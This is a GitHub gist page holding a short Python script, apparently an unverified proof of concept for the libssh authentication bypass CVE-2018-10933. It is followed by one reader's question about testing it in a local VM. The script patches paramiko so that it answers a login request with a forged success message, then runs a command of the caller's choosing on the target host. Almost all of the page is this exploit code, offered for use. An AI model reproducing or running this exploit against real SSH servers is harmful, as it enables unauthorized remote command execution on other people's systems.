Skip to content

Instantly share code, notes, and snippets.

@mlosapio
Last active February 3, 2024 18:50
Show Gist options
  • Save mlosapio/2062ebf943485a7289d226e0d00498e7 to your computer and use it in GitHub Desktop.
Save mlosapio/2062ebf943485a7289d226e0d00498e7 to your computer and use it in GitHub Desktop.
#!/usr/bin/env python
# Based on https://www.openwall.com/lists/oss-security/2018/08/16/1
# untested CVE-2018-10933
import sys, paramiko
import logging
username = sys.argv[1]
hostname = sys.argv[2]
command = sys.argv[3]
new_auth_accept = paramiko.auth_handler.AuthHandler._handler_table[
paramiko.common.MSG_USERAUTH_SUCCESS]
def auth_accept(*args, **kwargs):
return new_auth_accept(*args, **kwargs)
paramiko.auth_handler.AuthHandler._handler_table.update({
paramiko.common.MSG_USERAUTH_REQUEST: auth_accept,
})
port = 22
try:
logging.basicConfig(stream=sys.stderr, level=logging.DEBUG)
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.WarningPolicy)
client.connect(hostname, port=port, username=username, password="", pkey=None, key_filename="fake.key")
stdin, stdout, stderr = client.exec_command(command)
print stdout.read(),
finally:
client.close()
@salik89
Copy link

salik89 commented Oct 2, 2020

Hi there, I chanced upon this and wondering if you could advise if there is a need for me to have an actual server before I can test this code? Or could I test it locally, eg. In Kali via VirtualBox?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment